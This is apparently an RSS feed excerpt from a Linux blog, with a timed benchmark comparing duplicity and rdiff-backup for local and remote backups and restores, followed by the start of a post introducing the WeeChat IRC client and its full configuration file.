<h4 id="sametestwithrdiffbackupanothercontainer">Same test with rdiff-backup (another container):</h4>

<p><strong>Full local backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup /tmp/tmp.5m5JUUohRz/ /var/rdiff-backup/

real    0m32.287s  
user    0m17.980s  
sys     0m11.658s  
</code></pre>

<p>Rdiff-backup: 32 seconds for the initial local backup.</p>

<h3 id="remotebackups">Remote backups</h3>

<p>Let's make a full backup to a remote node (using ssh): <br />
<strong>Full remote backup::#duplicity</strong>    </p>

<p><strong>Warning:</strong> duplicity 0.6.18 has a known <em>bug</em> (caused by one of its python libraries) that produces   </p>

<p><code>
BackendException: ssh connection to host:22 failed: Unknown server host <br />
</code>  </p>

<p>This is because duplicity can't read the ecdsa public key from the known_hosts file. <br />
You can disable the ecdsa HostKey on the server, export custom options for the duplicity ssh connection (-o HostKeyAlgorithms), or (the better way) update duplicity. The Debian backports repository has version 0.6.24, which works perfectly.   </p>

<pre><code class="language-bash">root@data01:/tmp/tmp.YMFLVKqr67# time duplicity --no-encryption /tmp/tmp.YMFLVKqr67/ ssh://storage01//var/duplicity/  
Local and Remote metadata are synchronized, no sync needed.  
Last full backup date: none  
No signatures found, switching to full backup.  
--------------[ Backup Statistics ]--------------
StartTime 1418780684.21 (Wed Dec 17 01:44:44 2014)  
EndTime 1418780731.53 (Wed Dec 17 01:45:31 2014)  
ElapsedTime 47.32 (47.32 seconds)  
SourceFiles 53236  
SourceFileSize 443979645 (423 MB)  
NewFiles 53236  
NewFileSize 443979645 (423 MB)  
DeletedFiles 0  
ChangedFiles 0  
ChangedFileSize 0 (0 bytes)  
ChangedDeltaSize 0 (0 bytes)  
DeltaEntries 53236  
RawDeltaSize 362387325 (346 MB)  
TotalDestinationSizeChange 218640081 (209 MB)  
Errors 0  
-------------------------------------------------


real    0m50.069s  
user    0m38.467s  
sys     0m5.536s  
</code></pre>

<p><strong>Result:</strong> 50 seconds</p>

<p><strong>Note:</strong> pay attention to the <strong>duplicity syntax</strong> for the remote node: <br />
<em>ssh://storage01//var/duplicity/</em> means /var/duplicity on the remote node <br />
<em>ssh://storage01/var/duplicity/</em> means $HOME/var/duplicity on the remote node</p>

<p><strong>Full remote backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup /tmp/tmp.5m5JUUohRz/ root@storage02::/var/rdiff-backup/

real    0m57.252s  
user    0m7.235s  
sys     0m2.590s  
</code></pre>

<p><strong>Result:</strong> 57 seconds</p>

<p><strong>Note:</strong> for remote backups, the same version of rdiff-backup <strong>must be installed on the remote node</strong>.</p>
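<p>A quick way to check this beforehand (a hedged sketch; the host name is the one from these tests):</p>

<pre><code class="language-bash"># Compare local and remote rdiff-backup versions before running a remote backup
rdiff-backup --version
ssh root@storage02 rdiff-backup --version
</code></pre>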

<h3 id="incrementalbackups">Incremental backups</h3>

<p>Now it's time for incremental backups. <br />
To add some data, I'll clone the node.js repo into the existing local directory: <br />
<code>root@data01:/tmp/tmp.YMFLVKqr67# mkdir userdata;cd ./userdata;git clone https://github.com/joyent/node.git
</code> <br />
Now I have <strong>43795 files</strong>, <strong>20474 directories</strong> and <strong>757MB</strong> of disk space.</p>

<p><strong>#1 Incremental local backup::#duplicity</strong></p>

<pre><code class="language-bash">root@data01:/# time duplicity --no-encryption /tmp/tmp.YMFLVKqr67/ file:///var/duplicity/  
Synchronizing remote metadata to local cache...  
Copying duplicity-full-signatures.20141216T213246Z.sigtar.gz to local cache.  
Copying duplicity-full.20141216T213246Z.manifest to local cache.  
Last full backup date: Tue Dec 16 21:32:46 2014  
--------------[ Backup Statistics ]--------------
StartTime 1418785790.38 (Wed Dec 17 03:09:50 2014)  
EndTime 1418785815.03 (Wed Dec 17 03:10:15 2014)  
ElapsedTime 24.65 (24.65 seconds)  
SourceFiles 64271  
SourceFileSize 677202919 (646 MB)  
NewFiles 11036  
NewFileSize 233227370 (222 MB)  
DeletedFiles 0  
ChangedFiles 0  
ChangedFileSize 0 (0 bytes)  
ChangedDeltaSize 0 (0 bytes)  
DeltaEntries 11036  
RawDeltaSize 229606454 (219 MB)  
TotalDestinationSizeChange 144816441 (138 MB)  
Errors 0  
-------------------------------------------------


real    0m26.750s  
user    0m23.144s  
sys     0m2.867s  
</code></pre>

<p><strong>Result:</strong> 27 seconds</p>

<p><strong>#1 Incremental remote backup::#duplicity</strong></p>

<pre><code class="language-bash">root@data01:/# time duplicity --no-encryption /tmp/tmp.YMFLVKqr67/ ssh://172.17.0.10//var/duplicity/  
Local and Remote metadata are synchronized, no sync needed.  
Last full backup date: Wed Dec 17 02:05:04 2014  
--------------[ Backup Statistics ]--------------
StartTime 1418785633.50 (Wed Dec 17 03:07:13 2014)  
EndTime 1418785667.86 (Wed Dec 17 03:07:47 2014)  
ElapsedTime 34.36 (34.36 seconds)  
SourceFiles 64271  
SourceFileSize 677202919 (646 MB)  
NewFiles 11036  
NewFileSize 233227370 (222 MB)  
DeletedFiles 0  
ChangedFiles 0  
ChangedFileSize 0 (0 bytes)  
ChangedDeltaSize 0 (0 bytes)  
DeltaEntries 11036  
RawDeltaSize 229606454 (219 MB)  
TotalDestinationSizeChange 144816441 (138 MB)  
Errors 0  
-------------------------------------------------


real    0m35.889s  
user    0m30.717s  
sys     0m3.750s
</code></pre>

<p><strong>Result:</strong> 36 seconds</p>

<p><strong>#1 Incremental local backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup /tmp/tmp.5m5JUUohRz/ /var/rdiff-backup/

real    3m54.791s  
user    0m22.843s  
sys     0m6.806s
</code></pre>

<p><strong>Result:</strong> 3 minutes and 55 seconds</p>

<p><strong>#1 Incremental remote backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup /tmp/tmp.5m5JUUohRz/ root@storage02::/var/rdiff-backup/

real    4m14.100s  
user    0m16.245s  
sys     0m2.813s  
</code></pre>

<p><strong>Result:</strong> 4 minutes and 14 seconds</p>

<p>Another backup; this time some data was removed:</p>

<p><code>root@data01:/tmp/tmp.YMFLVKqr67# rm -rf ./addons</code></p>

<p>Local data now has <strong>42653 files</strong>, <strong>20030 directories</strong> and <strong>731MB</strong> of space.</p>

<p><strong>#2 Incremental local backup::#duplicity</strong></p>

<pre><code class="language-bash">root@data01:/# time duplicity --no-encryption /tmp/tmp.YMFLVKqr67/ file:///var/duplicity/  
Local and Remote metadata are synchronized, no sync needed.  
Last full backup date: Tue Dec 16 21:32:46 2014  
--------------[ Backup Statistics ]--------------
StartTime 1418837027.28 (Wed Dec 17 17:23:47 2014)  
EndTime 1418837041.33 (Wed Dec 17 17:24:01 2014)  
ElapsedTime 14.06 (14.06 seconds)  
SourceFiles 62686  
SourceFileSize 652525867 (622 MB)  
NewFiles 2  
NewFileSize 8192 (8.00 KB)  
DeletedFiles 1585  
ChangedFiles 1  
ChangedFileSize 649680 (634 KB)  
ChangedDeltaSize 0 (0 bytes)  
DeltaEntries 1588  
RawDeltaSize 649808 (635 KB)  
TotalDestinationSizeChange 241702 (236 KB)  
Errors 0  
-------------------------------------------------


real    0m14.372s  
user    0m11.946s  
sys     0m2.208s
</code></pre>

<p><strong>Result:</strong> 14 seconds</p>

<p><strong>#2 Incremental remote backup::#duplicity</strong></p>

<pre><code class="language-bash">root@data01:/# time duplicity --no-encryption /tmp/tmp.YMFLVKqr67/ ssh://storage01//var/duplicity/  
Synchronizing remote metadata to local cache...  
Copying duplicity-inc.20141217T020504Z.to.20141217T030713Z.manifest to local cache.  
Copying duplicity-new-signatures.20141217T020504Z.to.20141217T030713Z.sigtar.gz to local cache.  
Last full backup date: Wed Dec 17 02:05:04 2014  
--------------[ Backup Statistics ]--------------
StartTime 1418837112.75 (Wed Dec 17 17:25:12 2014)  
EndTime 1418837127.06 (Wed Dec 17 17:25:27 2014)  
ElapsedTime 14.31 (14.31 seconds)  
SourceFiles 62686  
SourceFileSize 652525867 (622 MB)  
NewFiles 2  
NewFileSize 8192 (8.00 KB)  
DeletedFiles 1585  
ChangedFiles 1  
ChangedFileSize 649680 (634 KB)  
ChangedDeltaSize 0 (0 bytes)  
DeltaEntries 1588  
RawDeltaSize 649808 (635 KB)  
TotalDestinationSizeChange 241702 (236 KB)  
Errors 0  
-------------------------------------------------


real    0m15.151s  
user    0m12.485s  
sys     0m2.359s  
</code></pre>

<p><strong>Result:</strong> 15 seconds</p>

<p><strong>#2 Incremental local backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup /tmp/tmp.5m5JUUohRz/ /var/rdiff-backup/

real    0m57.376s  
user    0m15.506s  
sys     0m2.582s
</code></pre>

<p><strong>Result:</strong> 57 seconds  </p>

<p><strong>#2 Incremental remote backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup /tmp/tmp.5m5JUUohRz/ root@storage02::/var/rdiff-backup/

real    0m54.370s  
user    0m3.627s  
sys     0m2.042s  
</code></pre>

<p><strong>Result:</strong> 54 seconds</p>

<p>And the last incremental backup; this time I'm adding two .iso files (23MB each). <br />
As a result: <strong>42655 files</strong>, <strong>20030 directories</strong> and <strong>777MB</strong> of space.</p>

<p><strong>#3 Incremental local backup::#duplicity</strong></p>

<pre><code class="language-bash">root@data01:/# time duplicity --no-encryption /tmp/tmp.YMFLVKqr67/ file:///var/duplicity/  
Local and Remote metadata are synchronized, no sync needed.  
Last full backup date: Tue Dec 16 21:32:46 2014  
--------------[ Backup Statistics ]--------------
StartTime 1418839612.96 (Wed Dec 17 18:06:52 2014)  
EndTime 1418839628.26 (Wed Dec 17 18:07:08 2014)  
ElapsedTime 15.31 (15.31 seconds)  
SourceFiles 62687  
SourceFileSize 700756267 (668 MB)  
NewFiles 4  
NewFileSize 48242688 (46.0 MB)  
DeletedFiles 1  
ChangedFiles 0  
ChangedFileSize 0 (0 bytes)  
ChangedDeltaSize 0 (0 bytes)  
DeltaEntries 5  
RawDeltaSize 48234496 (46.0 MB)  
TotalDestinationSizeChange 29748287 (28.4 MB)  
Errors 0  
-------------------------------------------------


real    0m15.509s  
user    0m13.164s  
sys     0m2.239s  
</code></pre>

<p><strong>Result:</strong> 16 seconds</p>

<p><strong>#3 Incremental remote backup::#duplicity</strong></p>

<pre><code class="language-bash">root@data01:/# time duplicity --no-encryption /tmp/tmp.YMFLVKqr67/ ssh://storage01//var/duplicity/  
Local and Remote metadata are synchronized, no sync needed.  
Last full backup date: Wed Dec 17 02:05:04 2014  
--------------[ Backup Statistics ]--------------
StartTime 1418839573.08 (Wed Dec 17 18:06:13 2014)  
EndTime 1418839595.15 (Wed Dec 17 18:06:35 2014)  
ElapsedTime 22.07 (22.07 seconds)  
SourceFiles 62687  
SourceFileSize 700756267 (668 MB)  
NewFiles 4  
NewFileSize 48242688 (46.0 MB)  
DeletedFiles 1  
ChangedFiles 0  
ChangedFileSize 0 (0 bytes)  
ChangedDeltaSize 0 (0 bytes)  
DeltaEntries 5  
RawDeltaSize 48234496 (46.0 MB)  
TotalDestinationSizeChange 29748287 (28.4 MB)  
Errors 0  
-------------------------------------------------


real    0m22.801s  
user    0m19.203s  
sys     0m3.067s  
</code></pre>

<p><strong>Result:</strong> 23 seconds</p>

<p><strong>#3 Incremental local backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup /tmp/tmp.5m5JUUohRz/ /var/rdiff-backup/

real    0m16.580s  
user    0m13.669s  
sys     0m1.922s  
</code></pre>

<p><strong>Result:</strong> 16 seconds</p>

<p><strong>#3 Incremental remote backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup /tmp/tmp.5m5JUUohRz/ root@storage02::/var/rdiff-backup/

real    0m21.882s  
user    0m5.306s  
sys     0m1.998s  
</code></pre>

<p><strong>Result:</strong> 22 seconds</p>

<h2 id="restoring">Restoring</h2>

<p>Time to recover our data. <br />
Oops: <code>root@data02:/tmp/tmp.5m5JUUohRz# rm -rf ./*</code> (I'll repeat this after each restore)</p>

<p><strong>Full restore from local backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup --restore-as-of now /var/rdiff-backup/ /tmp/tmp.5m5JUUohRz/

real    0m57.613s  
user    0m14.083s  
sys     0m14.696s  
</code></pre>

<p><strong>Result:</strong> 58 seconds</p>

<p><strong>Full restore from remote backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup --restore-as-of now root@storage02::/var/rdiff-backup/ /tmp/tmp.5m5JUUohRz/

real    1m34.002s  
user    0m11.524s  
sys     0m6.837s  
</code></pre>

<p><strong>Result:</strong> 1 minute and 34 seconds</p>

<p><strong>Full restore from local backup::#duplicity</strong></p>

<pre><code class="language-bash">root@data01:/tmp/tmp.YMFLVKqr67# time duplicity --no-encryption file:///var/duplicity/ /tmp/tmp.YMFLVKqr67/  
Local and Remote metadata are synchronized, no sync needed.  
Last full backup date: Tue Dec 16 21:32:46 2014

real    0m35.601s  
user    0m21.941s  
sys     0m8.692s  
</code></pre>

<p><strong>Result:</strong> 36 seconds</p>

<p><strong>Full restore from remote backup::#duplicity</strong></p>

<pre><code class="language-bash">root@data01:/# time duplicity --no-encryption ssh://storage01//var/duplicity/ /tmp/tmp.YMFLVKqr67/  
Local and Remote metadata are synchronized, no sync needed.  
Last full backup date: Wed Dec 17 02:05:04 2014

real    0m45.229s  
user    0m35.745s  
sys     0m9.431s  
</code></pre>

<p><strong>Result:</strong> 45 seconds</p>

<h2 id="restoringtospecifictime">Restoring to specific time:</h2>

<p><strong>Restore from specific local backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup --restore-as-of 2014-12-17T17:34:04Z /var/rdiff-backup/ /tmp/tmp.5m5JUUohRz/

real    0m31.792s  
user    0m15.487s  
sys     0m11.008s  
</code></pre>

<p><strong>Result:</strong> 32 seconds</p>

<p><strong>Restore from specific remote backup::#rdiff-backup</strong></p>

<pre><code class="language-bash">root@data02:/# time rdiff-backup --restore-as-of 2014-12-17T17:38:01Z storage02::/var/rdiff-backup/ /tmp/tmp.5m5JUUohRz/

real    1m30.043s  
user    0m11.345s  
sys     0m6.923s  
</code></pre>

<p><strong>Result:</strong> 1 minute and 30 seconds</p>

<p><strong>Restore from specific local backup::#duplicity</strong></p>

<pre><code class="language-bash">root@data01:/# time duplicity --no-encryption -t 2014-12-17T17:23:47Z file:///var/duplicity/ /tmp/tmp.YMFLVKqr67/  
Local and Remote metadata are synchronized, no sync needed.  
Last full backup date: Tue Dec 16 21:32:46 2014

real    0m25.768s  
user    0m17.950s  
sys     0m6.917s  
</code></pre>

<p><strong>Result:</strong> 26 seconds</p>

<p><strong>Restore from specific remote backup::#duplicity</strong></p>

<pre><code class="language-bash">root@data01:/# time duplicity --no-encryption -t 2014-12-17T17:25:12Z ssh://storage01//var/duplicity/ /tmp/tmp.YMFLVKqr67/  
Local and Remote metadata are synchronized, no sync needed.  
Last full backup date: Wed Dec 17 02:05:04 2014

real    0m46.186s  
user    0m38.004s  
sys     0m10.209s  
</code></pre>

<p><strong>Result:</strong> 46 seconds</p>

<h2 id="resultsandconclusion">Results and conclusion</h2>

<p>I think this is enough. I've run many tests, starting from <strong>33599 files</strong>, <strong>19637 directories</strong> and 512MB of space, up to <strong>42653 files</strong>, <strong>20030 directories</strong> and 731MB of space.</p>

<p>This chart shows how long the <strong style="color:#d7a502">Rdiff-backup</strong> and <strong style="color:#f05b4f">Duplicity</strong> backup processes took (lower is better):</p>

<div class='ct-chart'><div class='ct-chart-bar'></div></div>

<p>As you can see, <strong>rdiff-backup is extremely slow at incremental backups with many files</strong> and at restoring data, though it is a little faster in the initial local backup.</p>

<p>But rdiff-backup has another disadvantage: <strong>occupied space</strong>. <br />
All duplicity backup data takes about <strong>387MB</strong>, while the same backup in rdiff-backup takes <strong>880MB</strong>. <br />
<strong>So rdiff-backup occupies 127% more space than duplicity.</strong> <br />
The reason is that duplicity stores all data in compressed files called volumes, which saves a lot of disk space. <br />
But this <strong>gap narrows</strong> when you remove data from local storage: in that case <strong>rdiff-backup</strong> compresses the difference and moves those files into a <strong>compressed snapshot</strong>. <br />
On the other hand, since all data in a duplicity backup is already compressed, it can be difficult to access a duplicity backup as regular files (which is easy with rdiff-backup), but I think that is a rare case :)</p>
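<p>The occupied space is easy to compare yourself (a sketch; the target directories are the ones used throughout these tests):</p>

<pre><code class="language-bash"># Summarize how much space each backup repository occupies
du -sh /var/duplicity/ /var/rdiff-backup/
</code></pre>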

<h3 id="comparisonofusedspacestrongstylecolord7a502rdiffbackupstrongandstrongstylecolorf05b4fduplicitystrongmb">Comparison of used space (<strong style="color:#d7a502">Rdiff-backup</strong> and  <strong style="color:#f05b4f">Duplicity</strong>, MB)</h3>

<div class='ct-chart'><div class="chart_wrapper"><div class='ct-chart-round'></div><div class='ct-chart-round_2'></div><div class='ct-chart-round_3'></div><div class='ct-chart-round_4'></div></div></div>

<div id='ct-chart_labels_r'><p>Initial backup</p><p>#1 Increment</p><p>#2 Increment</p><p>#3 Increment</p></div>

<p><strong>That's all folks.</strong></p>

<p>Links: <br />
<a href='http://duplicity.nongnu.org/' >Duplicity</a> <br />
<a href='http://www.nongnu.org/rdiff-backup/' >Rdiff-backup</a> <br />
<a href='http://gionkunz.github.io/chartist-js/' >Chartist-js</a>  </p>

<style>  
div[class^="ct-chart-round"] {  
    display: inline;
    float: left;
    height: 200px;
    margin-bottom: 0;
    margin-left: 25px;
    margin-top: 50px;
    width: 200px;
}
.ct-chart-bar {
    height: 550px;
    width: auto;
}
div#ct-chart_labels_r {  
    display: block;
    float: left;
    height: auto;
    width: 100%;
}
#ct-chart_labels_r > p {
    display: block;
    float: left;
    height: 100px;
    margin-left: 25px;
    text-align: center;
    width: 200px;
}
.chart_wrapper {
    display: block;
    float: left;
    height: auto;
    width: 100%;
}
.ct-label.ct-horizontal {
    line-height: 14px;
    width: 90% !important;
}
</style>  

<script>  
new Chartist.Bar('.ct-chart-bar', {  
  labels: ['Initial local', 'Initial remote', '#1 Incremental local', '#1 Incremental remote', '#2 Incremental local', '#2 Incremental remote', '#3 Incremental local', '#3 Incremental remote','Local restore to last state','Remote restore to last state','Local restore to specific state','Remote restore to specific state'],
  series: [
    [32, 57, 233, 254,57,54,16.5,22,57.6,74,31,90],
    [36, 50, 27, 35,15,14,15.5,23,35,45.2,25,46],
  ]
}, {
  seriesBarDistance: 20,
  axisX: {
    offset: 60
  },
  axisY: {
    offset: 80,
    labelInterpolationFnc: function(value) {
      return value + ' sec'
    },
    scaleMinSpace: 15
  }
});
new Chartist.Pie('.ct-chart-round', {  
  series: [592,217]
}, {
  donut: true,
  donutWidth: 50,
  startAngle: 360,
  total: 809,
  showLabel: true
});
new Chartist.Pie('.ct-chart-round_2', {  
  series: [843,360]
}, {
  donut: true,
  donutWidth: 50,
  startAngle: 360,
  total: 1203,
  showLabel: true
});
new Chartist.Pie('.ct-chart-round_3', {  
  series: [833,360]
}, {
  donut: true,
  donutWidth: 50,
  startAngle: 360,
  total: 1193,
  showLabel: true
});
new Chartist.Pie('.ct-chart-round_4', {  
  series: [884,410]
}, {
  donut: true,
  donutWidth: 50,
  startAngle: 360,
  total: 1294,
  showLabel: true
});
</script>]]></description><link>http://blog.roundside.com/duplicity-vs-rdiff-backup-in-action/</link><guid isPermaLink="false">dbc60cd3-3b6e-4a3c-ac0a-77364097b577</guid><category><![CDATA[linux]]></category><category><![CDATA[backup]]></category><category><![CDATA[duplicity]]></category><category><![CDATA[rdiff-backup]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Sun, 07 Dec 2014 03:40:10 GMT</pubDate></item><item><title><![CDATA[Weechat, ncurses-based irc client]]></title><description><![CDATA[<p><a href='http://weechat.org/' >Weechat</a>, like irssi, is a nice IRC client. But weechat has some 'hidden' power: it can run scripts (in Ruby, Perl, Python, Lua and more) that extend its functionality and usability.</p>
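<p>For example, scripts can be managed from inside weechat with the built-in script manager (available in weechat 0.3.9 and later; the script name below is just an example):</p>

<pre><code class="language-bash">/script search buffers
/script install buffers.pl
</code></pre>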

<p><img class='middlecenter' src='http://files.roundside.com/content/weechat.png' ></p>

<p>Keys:</p>

<ul>
<li>F11:F12  - scroll user list up/down</li>
<li>F9:F10 - scroll top bar left/right</li>
<li>/CL - clear screen</li>
<li>/save - save modifications to config files</li>
</ul>

<p>Connecting to freenode (just as an example) is pretty easy:</p>

<pre><code class="language-bash">/connect irc.freenode.net
/msg NickServ identify password
</code></pre>

<p>To register:</p>

<pre><code class="language-bash">msg nickserv register  
</code></pre>

<p>Below is my simple weechat config (~/.weechat/weechat.conf):</p>

<pre><code class="language-bash">#
# weechat.conf -- weechat v0.4.3
#

[debug]

[startup]
command_after_plugins = ""  
command_before_plugins = ""  
display_logo = on  
display_version = on  
sys_rlimit = ""

[look]
align_end_of_lines = message  
bar_more_down = "▼"  
bar_more_left = "◀"  
bar_more_right = "▶"  
bar_more_up = "▲"  
buffer_auto_renumber = on  
buffer_notify_default = all  
buffer_position = end  
buffer_search_case_sensitive = off  
buffer_search_force_default = off  
buffer_search_regex = off  
buffer_search_where = message  
buffer_time_format = "%H:%M:%S"  
color_basic_force_bold = off  
color_inactive_buffer = on  
color_inactive_message = on  
color_inactive_prefix = on  
color_inactive_prefix_buffer = on  
color_inactive_time = off  
color_inactive_window = on  
color_nick_offline = on  
color_pairs_auto_reset = 5  
color_real_white = off  
command_chars = ""  
confirm_quit = off  
day_change = on  
day_change_message_1date = "▬▬▶ %a, %d %b %Y ◀▬▬"  
day_change_message_2dates = "▬▬▶ %%a, %%d %%b %%Y (%a, %d %b %Y) ◀▬▬"  
eat_newline_glitch = off  
emphasized_attributes = ""  
highlight = ""  
highlight_regex = ""  
highlight_tags = ""  
hotlist_add_buffer_if_away = on  
hotlist_buffer_separator = ", "  
hotlist_count_max = 2  
hotlist_count_min_msg = 2  
hotlist_names_count = 3  
hotlist_names_length = 0  
hotlist_names_level = 12  
hotlist_names_merged_buffers = off  
hotlist_prefix = "H: "  
hotlist_short_names = on  
hotlist_sort = group_time_asc  
hotlist_suffix = ""  
hotlist_unique_numbers = on  
input_cursor_scroll = 20  
input_share = none  
input_share_overwrite = off  
input_undo_max = 32  
item_buffer_filter = "•"  
item_buffer_zoom = "!"  
item_time_format = "%H:%M"  
jump_current_to_previous_buffer = on  
jump_previous_buffer_when_closing = on  
jump_smart_back_to_buffer = on  
key_bind_safe = on  
mouse = off  
mouse_timer_delay = 100  
nick_prefix = ""  
nick_suffix = ""  
paste_bracketed = on  
paste_bracketed_timer_delay = 10  
paste_max_lines = 1  
prefix_action = " *"  
prefix_align = right  
prefix_align_max = 0  
prefix_align_min = 0  
prefix_align_more = "+"  
prefix_align_more_after = on  
prefix_buffer_align = right  
prefix_buffer_align_max = 0  
prefix_buffer_align_more = "+"  
prefix_buffer_align_more_after = on  
prefix_error = "=!="  
prefix_join = "▬▬▶"  
prefix_network = "--"  
prefix_quit = "◀▬▬"  
prefix_same_nick = ""  
prefix_suffix = "|"  
read_marker = line  
read_marker_always_show = off  
read_marker_string = "─"  
save_config_on_exit = on  
save_layout_on_exit = none  
scroll_amount = 3  
scroll_bottom_after_switch = off  
scroll_page_percent = 100  
search_text_not_found_alert = on  
separator_horizontal = "="  
separator_vertical = ""  
tab_width = 1  
time_format = "%a, %d %b %Y %T"  
window_auto_zoom = off  
window_separator_horizontal = on  
window_separator_vertical = on  
window_title = "WeeChat ${info:version}"

[palette]

[color]
bar_more = blue  
chat = default  
chat_bg = default  
chat_buffer = white  
chat_channel = white  
chat_day_change = cyan  
chat_delimiters = default  
chat_highlight = black  
chat_highlight_bg = brown  
chat_host = cyan  
chat_inactive_buffer = default  
chat_inactive_window = default  
chat_nick = default  
chat_nick_colors = "brown,cyan,lightred,lightgreen,yellow,lightblue,lightmagenta,lightcyan"  
chat_nick_offline = default  
chat_nick_offline_highlight = default  
chat_nick_offline_highlight_bg = default  
chat_nick_other = cyan  
chat_nick_prefix = green  
chat_nick_self = cyan  
chat_nick_suffix = green  
chat_prefix_action = white  
chat_prefix_buffer = brown  
chat_prefix_buffer_inactive_buffer = default  
chat_prefix_error = yellow  
chat_prefix_join = darkgray  
chat_prefix_more = default  
chat_prefix_network = default  
chat_prefix_quit = darkgray  
chat_prefix_suffix = default  
chat_read_marker = 31  
chat_read_marker_bg = default  
chat_server = brown  
chat_tags = red  
chat_text_found = yellow  
chat_text_found_bg = lightmagenta  
chat_time = darkgray  
chat_time_delimiters = darkgray  
chat_value = cyan  
emphasized = yellow  
emphasized_bg = magenta  
input_actions = lightgreen  
input_text_not_found = red  
nicklist_away = default  
nicklist_group = green  
nicklist_offline = default  
separator = 6  
status_count_highlight = magenta  
status_count_msg = brown  
status_count_other = default  
status_count_private = green  
status_data_highlight = 163  
status_data_msg = yellow  
status_data_other = default  
status_data_private = lightgreen  
status_filter = green  
status_more = yellow  
status_name = white  
status_name_ssl = lightgreen  
status_number = yellow  
status_time = default

[completion]
base_word_until_cursor = on  
default_template = "%(nicks)|%(irc_channels)"  
nick_add_space = on  
nick_completer = ":"  
nick_first_only = off  
nick_ignore_chars = "[]`_-^"  
partial_completion_alert = on  
partial_completion_command = off  
partial_completion_command_arg = off  
partial_completion_count = on  
partial_completion_other = off

[history]
display_default = 5  
max_buffer_lines_minutes = 0  
max_buffer_lines_number = 4096  
max_commands = 100  
max_visited_buffers = 50

[proxy]

[network]
connection_timeout = 60  
gnutls_ca_file = "/etc/ssl/certs/ca-certificates.crt"  
gnutls_handshake_timeout = 30  
proxy_curl = ""

[plugin]
autoload = "*"  
debug = off  
extension = ".so,.dll"  
path = "%h/plugins"  
save_config_on_unload = on

[bar]
input.color_bg = default  
input.color_delim = cyan  
input.color_fg = default  
input.conditions = ""  
input.filling_left_right = vertical  
input.filling_top_bottom = horizontal  
input.hidden = off  
input.items = "[input_prompt]+(away),[input_search],[input_paste],input_text"  
input.position = bottom  
input.priority = 1000  
input.separator = off  
input.size = 1  
input.size_max = 0  
input.type = window  
nicklist.color_bg = default  
nicklist.color_delim = cyan  
nicklist.color_fg = default  
nicklist.conditions = "${nicklist}"  
nicklist.filling_left_right = vertical  
nicklist.filling_top_bottom = columns_vertical  
nicklist.hidden = off  
nicklist.items = "buffer_nicklist"  
nicklist.position = right  
nicklist.priority = 200  
nicklist.separator = on  
nicklist.size = 0  
nicklist.size_max = 0  
nicklist.type = window  
status.color_bg = 60  
status.color_delim = cyan  
status.color_fg = default  
status.conditions = ""  
status.filling_left_right = vertical  
status.filling_top_bottom = horizontal  
status.hidden = off  
status.items = "[time],[buffer_count],[buffer_plugin],buffer_number+:+buffer_name+(buffer_modes)+{buffer_nicklist_count}+buffer_zoom+buffer_filter,[lag],[hotlist],completion,scroll"  
status.position = bottom  
status.priority = 500  
status.separator = off  
status.size = 1  
status.size_max = 0  
status.type = window  
title.color_bg = darkgray  
title.color_delim = cyan  
title.color_fg = default  
title.conditions = ""  
title.filling_left_right = vertical  
title.filling_top_bottom = horizontal  
title.hidden = off  
title.items = "buffer_title"  
title.position = top  
title.priority = 500  
title.separator = off  
title.size = 1  
title.size_max = 0  
title.type = window

[layout]

[notify]

[filter]

[key]
ctrl-? = "/input delete_previous_char"  
ctrl-A = "/input move_beginning_of_line"  
ctrl-B = "/input move_previous_char"  
ctrl-C_ = "/input insert \x1F"  
ctrl-Cb = "/input insert \x02"  
ctrl-Cc = "/input insert \x03"  
ctrl-Ci = "/input insert \x1D"  
ctrl-Co = "/input insert \x0F"  
ctrl-Cv = "/input insert \x16"  
ctrl-D = "/input delete_next_char"  
ctrl-E = "/input move_end_of_line"  
ctrl-F = "/input move_next_char"  
ctrl-H = "/input delete_previous_char"  
ctrl-I = "/input complete_next"  
ctrl-J = "/input return"  
ctrl-K = "/input delete_end_of_line"  
ctrl-L = "/window refresh"  
ctrl-M = "/input return"  
ctrl-N = "/buffer +1"  
ctrl-P = "/buffer -1"  
ctrl-R = "/input search_text"  
ctrl-Sctrl-U = "/input set_unread"  
ctrl-T = "/input transpose_chars"  
ctrl-U = "/input delete_beginning_of_line"  
ctrl-W = "/input delete_previous_word"  
ctrl-X = "/input switch_active_buffer"  
ctrl-Y = "/input clipboard_paste"  
meta-meta2-1~ = "/window scroll_top"  
meta-meta2-23~ = "/bar scroll nicklist * b"  
meta-meta2-24~ = "/bar scroll nicklist * e"  
meta-meta2-4~ = "/window scroll_bottom"  
meta-meta2-5~ = "/window scroll_up"  
meta-meta2-6~ = "/window scroll_down"  
meta-meta2-7~ = "/window scroll_top"  
meta-meta2-8~ = "/window scroll_bottom"  
meta-meta2-A = "/buffer -1"  
meta-meta2-B = "/buffer +1"  
meta-meta2-C = "/buffer +1"  
meta-meta2-D = "/buffer -1"  
meta-/ = "/input jump_last_buffer_displayed"  
meta-0 = "/buffer *10"  
meta-1 = "/buffer *1"  
meta-2 = "/buffer *2"  
meta-3 = "/buffer *3"  
meta-4 = "/buffer *4"  
meta-5 = "/buffer *5"  
meta-6 = "/buffer *6"  
meta-7 = "/buffer *7"  
meta-8 = "/buffer *8"  
meta-9 = "/buffer *9"  
meta-&lt; = "/input jump_previously_visited_buffer"  
meta-= = "/filter toggle"  
meta-&gt; = "/input jump_next_visited_buffer"  
meta-OA = "/input history_global_previous"  
meta-OB = "/input history_global_next"  
meta-OC = "/input move_next_word"  
meta-OD = "/input move_previous_word"  
meta-OF = "/input move_end_of_line"  
meta-OH = "/input move_beginning_of_line"  
meta-Oa = "/input history_global_previous"  
meta-Ob = "/input history_global_next"  
meta-Oc = "/input move_next_word"  
meta-Od = "/input move_previous_word"  
meta2-15~ = "/buffer -1"  
meta2-17~ = "/buffer +1"  
